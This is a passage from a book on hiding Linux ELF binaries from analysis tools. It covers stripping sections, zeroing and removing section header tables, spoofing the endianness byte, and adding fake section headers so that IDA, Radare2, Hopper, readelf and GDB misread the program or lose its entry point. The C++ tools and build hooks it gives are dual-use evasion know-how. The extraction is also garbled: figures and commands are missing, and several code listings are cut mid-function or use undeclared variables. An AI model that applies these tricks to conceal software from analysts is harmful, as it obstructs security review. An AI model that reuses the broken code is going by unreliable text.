You might be asking, how do I know Im no longer using any dynamic libraries? One
way is to check the needed shared librarys listed in the dynamic section. You can
use readelf to this.
Chapter 2: Compiler Options 62
The first line says that the shared library libc.so.6 is needed. However, after
compiling with musl libc the dynamic section doesnt even exist.
Chapter 2: Compiler Options 63
You can see that Trouble had a few external dependencies before musl but after
switching libc versions it doesnt have any dynamic dependencies. Weve stopped
any pesky reverse engineer from using LD_PRELOAD or ltrace on Trouble!
Chapter 3: File Format Hacks
This chapter is all about modifying the ELF data structures after compilation. Having
some understanding of these data structures would be useful in understanding this
chapter. However, I dont think you have to know ELF in order to benefit from this
chapter. You should pick up a good amount as we go.
The main reason Ive not written a primer on ELF for this book is because there are
many good descriptions that already exist. If youd like to brush up on ELF than
check out these resources:
1. man elf
2. https://en.wikipedia.org/wiki/Executable_and_Linkable_Format
3. http://wiki.osdev.org/ELF
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 0000000000400120 00000120
0000000000000003 0000000000000000 AX 0 0 1
[ 2] .text PROGBITS 0000000000400130 00000130
000000000000126f 0000000000000000 AX 0 0 16
[ 3] .fini PROGBITS 000000000040139f 0000139f
0000000000000003 0000000000000000 AX 0 0 1
[ 4] .rodata PROGBITS 00000000004013c0 000013c0
0000000000000858 0000000000000000 A 0 0 64
[ 5] .eh_frame PROGBITS 0000000000401c18 00001c18
0000000000000004 0000000000000000 A 0 0 4
[ 6] .init_array INIT_ARRAY 0000000000601fe8 00001fe8
0000000000000008 0000000000000000 WA 0 0 8
[ 7] .fini_array FINI_ARRAY 0000000000601ff0 00001ff0
0000000000000008 0000000000000000 WA 0 0 8
[ 8] .jcr PROGBITS 0000000000601ff8 00001ff8
0000000000000008 0000000000000000 WA 0 0 8
[ 9] .data PROGBITS 0000000000602000 00002000
0000000000000160 0000000000000000 WA 0 0 64
[10] .bss NOBITS 0000000000602180 00002160
0000000000000320 0000000000000000 WA 0 0 64
[11] .comment PROGBITS 0000000000000000 00002160
0000000000000058 0000000000000001 MS 0 0 1
[12] .shstrtab STRTAB 0000000000000000 000021b8
0000000000000060 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Notice the .comment section? Thats a really odd name for a section. Lets examine
its contents using objdump.
Chapter 3: File Format Hacks 66
Contents of .comment
Those look like some kind of version strings? To get a cleaner read you can use the
strings utility.
The first string is the version of GCC thats on Ubuntu 16.04. Honestly, Im not
entirely certain what the second string is all about. Regardless! We dont need or
want this information in our binary. While the information isnt going to aid a
reverse engineer in pulling apart our binary it could help with various attribution
techniques. So lets just remove it. Strip can remove sections via the -R option.
Chapter 3: File Format Hacks 67
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 0000000000400120 00000120
0000000000000003 0000000000000000 AX 0 0 1
[ 2] .text PROGBITS 0000000000400130 00000130
000000000000126f 0000000000000000 AX 0 0 16
[ 3] .fini PROGBITS 000000000040139f 0000139f
0000000000000003 0000000000000000 AX 0 0 1
[ 4] .rodata PROGBITS 00000000004013c0 000013c0
0000000000000858 0000000000000000 A 0 0 64
[ 5] .eh_frame PROGBITS 0000000000401c18 00001c18
0000000000000004 0000000000000000 A 0 0 4
[ 6] .init_array INIT_ARRAY 0000000000601fe8 00001fe8
0000000000000008 0000000000000000 WA 0 0 8
[ 7] .fini_array FINI_ARRAY 0000000000601ff0 00001ff0
0000000000000008 0000000000000000 WA 0 0 8
[ 8] .jcr PROGBITS 0000000000601ff8 00001ff8
0000000000000008 0000000000000000 WA 0 0 8
[ 9] .data PROGBITS 0000000000602000 00002000
0000000000000160 0000000000000000 WA 0 0 64
[10] .bss NOBITS 0000000000602180 00002160
0000000000000320 0000000000000000 WA 0 0 64
[11] .shstrtab STRTAB 0000000000000000 00002160
0000000000000057 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
As you can see from the above, not only has .comment been removed from the section
header table, but the next entry, .shstrtab, has been moved up to overwrite when
.comment used to exist.
Chapter 3: File Format Hacks 68
You dont want to manually execute strip -R after every build though. That would
just be sort of annoying. Luckily, CMake provides the ability to execute commands.
If you add the following command to the end of Troubles CMakeList.txt than the
.comment section will be removed everytime the binary is compiled:
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND strip -R .comment ${CMAKE_CURRENT_BINARY_DIR}/${PROJECT_NA\
ME})
There are four variables from the ELF header that are used to find, parse, and display
the section headers table:
If you zero out these values then locating or parsing the table would be impossible.
Try opening Trouble in a hex editor (such as ghex) and zero out bytes 0x28, 0x29,
0x3a, 0x3c, and 0x3e. Afterwards Troubles ELF header should look like this:
As you can see all the section header table values in the ELF headers are set to zero.
Now if readelf tries to read Troubles section header table itll fail.
For another example, try Radare2. Before you zeroed out the values in the ELF header
Radare2 listed the sections without issue.
Youll notice that Radare2 has combined the section headers table and the program
headers into a sections table. This isnt technically correct, but good enough. If you
look carefully, youll see all the sections from the section headers table that have
virtual addresses (indexes 1-10) map into LOAD0 and LOAD1 from the program
headers. This helps explain why the section headers table isnt needed to execute the
binary. All the necessary information is present in the program headers.
After you zero out the ELF header values, Radare2 can no longer find the section
headers table either.
However, the table is still there. A clever reverse engineer could scan the binary
for the section headers table data structures. Plus the section names are easily
recoverable using the strings utility.
Chapter 3: File Format Hacks 72
Removing the section headers table altogther seems like a smart idea. Not only would
removing the table hide the section information, but it will pave the way for some
trickery introduced later in this chapter.
However, there is no tool that I know of that will remove the section headers table.
Ive had to write out own. In the code for chapter three youll find a directory called
stripBinary. The project is made up of two files: CMakeLists.txt and stripBinary.cpp.
Note that this is our first project written in C++. I personally prefer C++, but your
mileage may vary. The code should be fairly easy to rewrite in C, Python, or your
language of choice.
chap_3_format_hacks/stripBinary/CMakeLists.txt
project(stripBinary CXX)
cmake_minimum_required(VERSION 3.0)
chap_3_format_hacks/stripBinary/stripBinary.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
/**
* This program will take in a binary and overwrite the sections table with
* zeroes. It will also overwite the sections names with zeroes. Finally, it
* fixes up the ELF header and overwrites the old binary.
*/
/**
* Finds the offset to the sections table.
*
* \param[in] p_data the ELF binary
* \param[in,out] p_sec_count the number of sections in the section table
* \param[in,out] p_str_index the section index of the section strings table
* \return a pointer to the start of the sections table
*/
Elf64_Shdr* find_sections(std::string& p_data, int& p_sec_count, int& p_str_index)
{
if (p_data[0] != 0x7f || p_data[1] != 'E' || p_data[2] != 'L' ||
p_data[3] != 'F')
{
return NULL;
}
p_sec_count = ehdr->e_shnum;
ehdr->e_shnum = 0;
p_str_index = ehdr->e_shstrndx;
ehdr->e_shstrndx = 0;
return reinterpret_cast<Elf64_Shdr*>(&p_data[section_offset]);
Chapter 3: File Format Hacks 74
/**
* Overwrites all the section headers with zeros and zeroes out the strings
*
* \param[in] p_data the ELF binary
* \param[in] p_sections a pointer to the first entry in the sections table
* \param[in] p_sec_count the number of entries in the sections table
* \param[in] p_str_index the index of the table we are going to remove
* \return true if we successfully overwrote everything
*/
bool remove_headers(std::string& p_data, Elf64_Shdr* p_sections, int p_sec_count,
int p_str_index)
{
// look through all the headers. Ensure nothing is using the string table
// we plan on removing.
Elf64_Shdr* iter = p_sections;
for (int i = 0; i < p_sec_count; ++i, ++iter)
{
if (iter->sh_link == static_cast<Elf64_Word>(p_str_index))
{
std::cerr << "A section is still linked to the str index: " << iter->sh_l\
ink << std::endl;
return false;
}
if (i == p_str_index)
{
// overwrite the strings
memset(&p_data[iter->sh_offset], 0, iter->sh_size);
}
}
return EXIT_FAILURE;
}
int section_count = 0;
int str_index = 0;
Elf64_Shdr* sections = find_sections(input, section_count, str_index);
if (sections == NULL || reinterpret_cast<char*>(sections) > (input.data() + input\
.length()))
{
std::cerr << "Failed to find the sections table" << std::endl;
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
Compiling stripBinary
albino-lobster@ubuntu:~/antire_book$ cd chap_3_format_hacks/stripBinary/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary/build$ cmake ..
-- The CXX compiler identification is GNU 5.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
-- Build files have been written to: /home/albino-lobster/antire_book/chap_3_format_h\
acks/stripBinary/build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary/build$ make
Scanning dependencies of target stripBinary
[ 50%] Building CXX object CMakeFiles/stripBinary.dir/src/stripBinary.cpp.o
[100%] Linking CXX executable stripBinary
[100%] Built target stripBinary
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary/build$ ./stripBin\
ary ~/antire_book/chap_3_format_hacks/trouble/build/trouble
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/stripBinary/build$ readelf -a\
~/antire_book/chap_3_format_hacks/trouble/build/trouble
ELF Header:
Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class: ELF64
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Advanced Micro Devices X86-64
Version: 0x1
Entry point address: 0x4002f2
Start of program headers: 64 (bytes into file)
Start of section headers: 0 (bytes into file)
Flags: 0x0
Size of this header: 64 (bytes)
Size of program headers: 56 (bytes)
Number of program headers: 4
Size of section headers: 64 (bytes)
Number of section headers: 0
Section header string table index: 0
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000001c1c 0x0000000000001c1c R E 200000
LOAD 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000178 0x00000000000004b8 RW 200000
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 10
GNU_RELRO 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000018 0x0000000000000018 R 1
Chapter 3: File Format Hacks 78
The decoding of unwind sections for machine type Advanced Micro Devices X86-64 is not\
currently supported.
Like removing the .comment section, it would be really great to make stripBinary
part of Troubles build process. However, because stripBinary is its own stand alone
CMake project youd need to restructure the Trouble CMake project. Well do so at
the beginning of the next chapter. For now, Ill simply remind you when stripBinary
should be applied to Trouble.
http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
Chapter 3: File Format Hacks 79
man elf
If you think about it, it sort of makes sense that this field isnt necessary to execute a
binary. A system is either little-endian or big-endian (unless its ARM which can be
bi-endian). As such, a loader probably doesnt need to check this byte because it can
only execute one or the other.
However, tools like readelf, Radare2, and IDA are expected to read files from many
architectures. This byte is important for them to determine the endianness of the
binary. So what happens if you insert a lie?
Look at what readelf currently says about the EI_DATA byte in Trouble (it appears
in both the Magic and Data lines):
As you can see from the readelf output, Troubles EI_DATA byte (the 6th byte in the
magic array) is set to 1 which means ELFDATA2LSB or Twos complement, little-
endian. Lets change that to 2 or Twos complement, big-endian using dd. Use the
following command:
Chapter 3: File Format Hacks 80
Note that seek starts at 0 so use seek=5 instead of seek=6. Now check out what readelf
has to say about Trouble.
Yikes! Thats properly messed up, isnt it? It appears that readelf believes the
endianness lie in Trouble.
I doubt that GDB could be tricked by this though, right?
Whoops. GDB rejected the executable with a File format not recognized error. Now
Im a little worried that Trouble wont even execute. However, a quick test proves that
Im able to execute Trouble and a client can still connect to it.
Chapter 3: File Format Hacks 82
It appears that flipping a single bit stops readelf and GDB from doing their proper
job. Lets see how our favorite disassemblers hold up against this attack.
Ok, so Radare2 is broken too. I also tried Hopper but it displays nothing which,
from an anti reverse engineering point of view, is great because the user is given no
hint as to what went wrong.
Chapter 3: File Format Hacks 83
The typo makes my inner third grader gleeful, but Im certain they mean byte six.
However, after hitting Yes to continue, IDA does successfully disassemble the entire
file. It appears IDA must have secondary methods for determining the true endianess.
Despite IDA raining on our parade, this seems like a useful little obfuscation and its
easy to add to our build process too. Just add the following line to the end of Troubles
CMakeLists.txt.
add_custom_command(TARGET ${PROJECT_NAME}
POST_BUILD
COMMAND echo 'Ag==' | base64 -d | dd conv=notrunc of=${CMAKE_CURRE\
NT_BINARY_DIR}/${PROJECT_NAME} bs=1 seek=5)
When compiling Trouble with the new EI_DATA obfuscation added it should look
like this:
Chapter 3: File Format Hacks 84
https://gcc.gnu.org/onlinedocs/gccint/Initialization.html
Chapter 3: File Format Hacks 85
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000001c1c 0x0000000000001c1c R E 200000
LOAD 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000178 0x00000000000004b8 RW 200000
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 10
GNU_RELRO 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000018 0x0000000000000018 R 1
The decoding of unwind sections for machine type Advanced Micro Devices X86-64 is not\
currently supported.
There are four program headers that describe Troubles address space. An important
part of the program headers is the flags field. The flag field describes if a segment is
executable, writeable, and/or readable. Of Troubles four program headers one is read
only (r), two are readable and writeable (rw), and one is readable and executable
(re). Do disassemblers use the flags field for their analysis? Lets experiment.
Lets try to create a fake section headers table that reverses the program headers
flag fields. This will hopefully make the disassembler think that the space described
by the first LOAD is not executable and the space described by the second load is.
The section headers table will have four entries:
Ive included code in chapter three that does exactly this. The project is called
fakeHeadersXBit. The project, again, contains two files: CMakeLists.txt and fake-
HeadersXBit.cpp.
Chapter 3: File Format Hacks 87
chap_3_format_hacks/fakeHeadersXbit/CMakeLists.txt
project(fakeHeadersXBit CXX)
cmake_minimum_required(VERSION 3.0)
fakeHeadersXBit.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <elf.h>
/**
* The goal of this tool is to confuse a disassembler into thinking that the
* executable portion of the code is data and the data portion of the code is
* executable.
*
* This tool will add a section table to a binary that doesn't have one. The
* section table will be made up of 4 headers:
*
* - null header
* - .data: this section covers what .text should, but we unset X and set W
* - .text: this section covers what .data should, but we set X and unset W
* - .shstrtab: the strings table.
*
* This code makes the assumption that the binary has two PF_LOAD segments in
* the program table. One segment with PF_X set and one with PF_W set.
*/
/*
* Edits the ELF header to indicate that there are 6 section headers and that
* the string table is the last one.
*
* \param[in,out] p_data the ELF binary
* \return true if its possible to add a section table. false otherwise
*/
Chapter 3: File Format Hacks 88
if (ehdr->e_shoff != 0)
{
std::cerr << "The binary already has a section table." << std::endl;
return false;
}
if (ehdr->e_shentsize != sizeof(Elf64_Shdr))
{
std::cerr << "Unexpected section header size" << std::endl;
return false;
}
ehdr->e_shoff = p_data.size();
ehdr->e_shnum = 4;
ehdr->e_shstrndx = 3;
return true;
}
/*
* This finds the PF_X segment and creates a section header named .data that
* does not have the X bit set.
*
* \param[in,out] p_data the ELF binary
* \param[in,out] p_strings the section table string names
* \return true if no error was encountered
*/
bool add_data_section(std::string& p_data, std::string& p_strings)
{
Elf64_Ehdr* ehdr = reinterpret_cast<Elf64_Ehdr*>(&p_data[0]);
Elf64_Phdr* phdr = reinterpret_cast<Elf64_Phdr*>(&p_data[0] + ehdr->e_phoff);
if (phdr->p_type == PT_LOAD)
{
if ((phdr->p_flags & PF_X) == PF_X)
{
return true;
}
}
}
return false;
}
/*
* This finds the PF_W segment and creates a section header named .text that
* has the X bit set.
*
* \param[in,out] p_data the ELF binary
* \param[in,out] p_strings the section table string names
* \return true if no error was encountered
*/
bool add_text_section(std::string& p_data, std::string& p_strings)
{
Elf64_Ehdr* ehdr = reinterpret_cast<Elf64_Ehdr*>(&p_data[0]);
Elf64_Phdr* phdr = reinterpret_cast<Elf64_Phdr*>(&p_data[0] + ehdr->e_phoff);
if (phdr->p_type == PT_LOAD)
{
if ((phdr->p_flags & PF_X) == 0)
{
Elf64_Shdr text_header = {};
text_header.sh_name = p_strings.size();
text_header.sh_type = SHT_PROGBITS;
text_header.sh_flags = SHF_ALLOC | SHF_EXECINSTR;
text_header.sh_addr = phdr->p_vaddr;
text_header.sh_offset = phdr->p_offset;
text_header.sh_size = phdr->p_filesz;
text_header.sh_link = 0;
text_header.sh_info = 0;
text_header.sh_addralign = 4;
text_header.sh_entsize = 0;
p_strings.append(".text");
p_strings.push_back('\x00');
p_data.append(reinterpret_cast<char*>(&text_header),
sizeof(text_header));
return true;
}
}
}
return false;
}
if (!add_data_section(p_data, strings))
{
std::cerr << "Failed to find the executable LOAD segment" << std::endl;
return false;
}
if (!add_text_section(p_data, strings))
Chapter 3: File Format Hacks 91
{
std::cerr << "Failed to find the writable LOAD segment" << std::endl;
return false;
}
// .shstrtab
Elf64_Shdr strtab = {};
strtab.sh_name = strings.size();
strtab.sh_type = SHT_STRTAB;
strtab.sh_flags = 0;
strtab.sh_addr = 0;
strtab.sh_offset = p_data.size() + sizeof(Elf64_Shdr);
strtab.sh_size = 0;
strtab.sh_link = 0;
strtab.sh_info = 0;
strtab.sh_addralign = 4;
strtab.sh_entsize = 0;
strings.append(".shstrtab");
strings.push_back('\x00');
strtab.sh_size = strings.size();
p_data.append(reinterpret_cast<char*>(&strtab), sizeof(strtab));
p_data.append(strings);
return true;
}
inputFile.close();
if (!edit_elf_header(input))
{
return EXIT_FAILURE;
}
if (!append_sections(input))
{
return EXIT_FAILURE;
}
outputFile.write(input.data(), input.length());
outputFile.close();
return EXIT_SUCCESS;
}
Compiling fakeHeadersXBit
albino-lobster@ubuntu:~/antire_book$ cd chap_3_format_hacks/fakeHeadersXbit/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersXbit$ mkdir build
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersXbit$ cd build/
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersXbit/build$ cmake \
..
-- The CXX compiler identification is GNU 5.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Configuring done
-- Generating done
Chapter 3: File Format Hacks 93
Previously you compiled Trouble and removed the section headers table using the
stripBinary tool. Now you can add the fake section headers table using fakeHeader-
sXBit,
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersXbit/build$ ./fake\
HeadersXBit ~/antire_book/chap_3_format_hacks/trouble/build/trouble
albino-lobster@ubuntu:~/antire_book/chap_3_format_hacks/fakeHeadersXbit/build$
The output isnt very exciting, but check out how Trouble has changed.
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .data PROGBITS 0000000000400000 00000000
0000000000001c1c 0000000000000000 WA 0 0 4
[ 2] .text PROGBITS 0000000000601fe8 00001fe8
0000000000000178 0000000000000000 AX 0 0 4
[ 3] .shstrtab STRTAB 0000000000000000 00002658
0000000000000017 0000000000000000 0 0 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000001c1c 0x0000000000001c1c R E 200000
LOAD 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000178 0x00000000000004b8 RW 200000
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 10
GNU_RELRO 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000018 0x0000000000000018 R 1
The decoding of unwind sections for machine type Advanced Micro Devices X86-64 is not\
currently supported.
readelf shows the four section headers that fakeHeadersXBit added. Also, you can see
that the .data and .text sections overlap with the same address space covered by the
LOAD segments in the program headers. However, notice that the read/write/execute
bits dont match between the program headers and section headers table.
Now the question is, How does this effect disassemblers? Lets start with IDA.
Before applying the fake table section IDA found 54 functions in Trouble and the
navigation bar appeared quite complete.
However, when IDA analyzes Trouble with the fakeHeadersXBit applied it only finds
22 functions and the navigation bar shows a lot of missing analysis.
Why did IDA fail? Consider the the entry point in disassembly.
Chapter 3: File Format Hacks 96
At 0x40030e you should notice that the address 0x400130 is moved into rdi. This
address is the beginning of Troubles main() function. Normally, IDA would disas-
semble that main() like this:
But when the fakeHeadersXBit sections headers table is added to Trouble the
disassembly of main() is never done:
Chapter 3: File Format Hacks 97
Why does this happen? Remember that fakeHeadersXBits section headers table tells
IDA that the area main() resides in is not executable. Therefore, IDA decides not to
treat it as code. This forces the reverse engineer to manually disassemble these types
of functions (or use a script to do so). Pretty neat!
All disassemblers work differently and this section is a great example. For example,
Hopper handles the fake section table even worse than IDA. Hopper is only able
to mark four functions and only two of those are correctly disassembled. On the
otherside of the coin, Radare2 doesnt appear to be affected by the fake sections table.
I believe Radare2 is not affected because it treats both the section entries and program
segments as sections and the program segments take precedence. Although that is
only a guess. The cool thing with Radare2 is you can look into a the code to find out.
However, that is an excercise Ill leave to the reader.
Updated edit_elf_header()
if (ehdr->e_shoff != 0)
{
std::cerr << "The binary already has a section table." << std::endl;
return false;
}
if (ehdr->e_shentsize != sizeof(Elf64_Shdr))
{
std::cerr << "Unexpected section header size" << std::endl;
return false;
}
ehdr->e_shoff = p_data.size();
ehdr->e_shnum = 6;
ehdr->e_shstrndx = 5;
return true;
}
Updated add_data_section()
fini_header.sh_link = 0;
fini_header.sh_info = 0;
fini_header.sh_addralign = 4;
fini_header.sh_entsize = 0;
p_strings.append(".fini");
p_strings.push_back('\x00');
p_data.append(reinterpret_cast<char*>(&fini_header),
sizeof(fini_header));
return true;
}
}
}
return false;
}
Recompile fakeHeadersXBit and Trouble. Use stripBinary to remove the real section
headers table from Trouble and then use fakeHeadersXBit to attach the fake section
headers table. If youve done this successfully then readelf should look like this:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 0000000000400000 00000000
0000000000000008 0000000000000000 AX 0 0 4
[ 2] .data PROGBITS 0000000000400009 00000009
0000000000001c0b 0000000000000000 WA 0 0 4
[ 3] .fini PROGBITS 0000000000401c14 00001c14
0000000000000008 0000000000000000 WA 0 0 4
[ 4] .text PROGBITS 0000000000601fe8 00001fe8
0000000000000178 0000000000000000 AX 0 0 4
[ 5] .shstrtab STRTAB 0000000000000000 000026d8
0000000000000023 0000000000000000 0 0 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Program Headers:
Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000
0x0000000000001c1c 0x0000000000001c1c R E 200000
LOAD 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000178 0x00000000000004b8 RW 200000
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 10
GNU_RELRO 0x0000000000001fe8 0x0000000000601fe8 0x0000000000601fe8
0x0000000000000018 0x0000000000000018 R 1
The decoding of unwind sections for machine type Advanced Micro Devices X86-64 is not\
currently supported.
Now if you try to load Trouble in Radare2 youll encounter an interesting problem.
Radare2 cant find the entry point! In fact, Radare2 doesnt find any functions! What
happened? To get a clearer view I started the Radare2 web GUI.
Chapter 3: File Format Hacks 103
The problem becomes obvious when looking at 0x400000. Remember that 0x400000
is where the ELF header starts, but our section headers table also says .init starts
there. It appears that Radare2 starts disassembling the fake .init section and never
stops!
When Radare2 tries to disassemble the entry point it finds that it has already been
marked as code which stops any further analysis.
Unfortunately, this trick doesnt work on IDA. While IDA also disassembles the fake
.init section it stops the disassembly where .init stops.
Chapter 3: File Format Hacks 104
However, its useful to know that IDA will diassemble the fake .init section. Maybe
we can stop the disassembly of the entry point using .init. Lets update the add_-
data_section() function in fakeHeadersXBit.cpp so that the .init section contains the
entry point address.
Updated add_data_section()
init_header.sh_info = 0;
init_header.sh_addralign = 4;
init_header.sh_entsize = 0;
p_strings.append(".init");
p_strings.push_back('\x00');
p_data.append(reinterpret_cast<char*>(&init_header),
sizeof(init_header));
return false;
}
Recompile Trouble and fakeHeadersXBit again. Remove Troubles section headers ta-
ble with stripBinary and apply the fake section headers table with fakeHeadersXBit.
If you look at the section headers table in Trouble youll see that the .init section has
become much larger.
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .init PROGBITS 0000000000400000 00000000
00000000000002f3 0000000000000000 AX 0 0 4
[ 2] .data PROGBITS 00000000004002f4 000002f4
0000000000001920 0000000000000000 WA 0 0 4
[ 3] .fini PROGBITS 0000000000401c14 00001c14
0000000000000008 0000000000000000 WA 0 0 4
[ 4] .text PROGBITS 0000000000601fe8 00001fe8
0000000000000178 0000000000000000 AX 0 0 4
[ 5] .shstrtab STRTAB 0000000000000000 000026d8
0000000000000023 0000000000000000 0 0 4
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Load the new version of Trouble into IDA. The first sign of failure is the navigation
bar. It looks like nothing gets disassembled!
IDA navigation bar for Trouble with fake sections headers table and an obfuscated entry
Now check out where you used overlapped the entry point and .init.
Chapter 3: File Format Hacks 107
Hiding the entry point from IDA by overlapping the entry and .init
.init:00000000004002F0 db 2 dup(0)
.init:00000000004002F2 public start
.init:00000000004002F2 start db 48h
.init:00000000004002F2 _init ends
.init:00000000004002F2
.data:00000000004002F4 ; ==================================================
.data:00000000004002F4
.data:00000000004002F4 ; Segment type: Pure data
.data:00000000004002F4 ; Segment permissions: Read/Write
.data:00000000004002F4 _data segment dword public 'DATA' use64
.data:00000000004002F4 assume cs:_data
.data:00000000004002F4 ;org 4002F4h
.data:00000000004002F4 db 0EDh ; f
.data:00000000004002F5 db 49h ; I
Because IDA stops the disassembly at the boundary of .init, it is unable to disassemble
any of the entry point. Without the entry point getting diassembled, IDA fails to
diassemble anything else due to the fact that you also messed with the executable
flag.
struct Elf64_Shdr
{
uint32_t sh_name;
uint32_t sh_type;
uint64_t sh_flags;
Elf64_Addr sh_addr;
Elf64_Off sh_offset;
uint64_t sh_size;
uint32_t sh_link;
uint32_t sh_info;
uint64_t sh_addralign;
uint64_t sh_entsize;
};
The three fields this technique is concerned with are sh_addr (the virtual address),
sh_offset (the physical offset), and sh_size. Its also important to note that the entry
point address in the ELF header is the virtual address.
Now, lets say you have a virtual address and you want to look up the actual location
in the binary. You look at the section headers table and find which section the virtual
address would fall within by calculating the range of sh_addr and sh_addr + sh_size.
Once youve found the section, youll want to calculate the physical offset of your
virtual address by subtracting the sh_addr and then adding the sh_offset. You should
now know the exact offset into the binary where you can find your virtual address.
However, what if we put in a bogus value for sh_addr? How does that break the
calculation? Lets say we have the following values:
virtual_address = 0x4002f0
sh_addr = 0x400000
sh_size = 0x000800
sh_offset = 0
Normally, youd be able to find 0x4002f0 at 0x2f0 bytes into the file ((0x4002f0 -
0x400000) + 0). However, if you introduce a little lie and say sh_addr = 0x400010
then the calculation changes. Now the math comes out that 0x4002f0 is 0x2e0 bytes
into the file.
Chapter 3: File Format Hacks 109
This is a technique you can use to hide the entry point. If you add a fake section
headers table and alter the base address of the section that contains the entry point
then any disassembler relying exclusively on the sections headers table wont be able
to properly find the entry point in the file.
I wrote some code that will do this so you can examine it further. The project is
called fakeHeadersHideEntry and can be found in the chapter three directory. There
are two files: CMakeLists.txt and fakeHeadersHideEntry.cpp.
chap_3_format_hacks/fakeHeadersHideEntry/CMakeLists.txt
project(fakeHeadersHideEntry CXX)
cmake_minimum_required(VERSION 3.0)
chap_3_format_hacks/fakeHeadersHideEntry/src/fakeHeadersHideEntry.cpp
#include <cstdlib>
#include <iostream>
#include <fstream>
#include <iomanip>
#include <cstring>
#include <ctime>
#include <elf.h>
/**
* This tool will cause disassemblers that rely on the sections table for
* virtual address mapping to fail to correctly find the entry point. This
* tool expects the provided binary to have no sections table. It will add
* its own fake table with four sections:
*
* - null header
* - .text: the section the code is in. This will have an altered sh_addr.
* - .data: the r/w data section
* - .shstrtab: the strings table.
*
* This code makes the assumption that the binary has two PF_LOAD segments in
* the program table. One segment with PF_X set and one with PF_W set.
*/
Chapter 3: File Format Hacks 110
/*
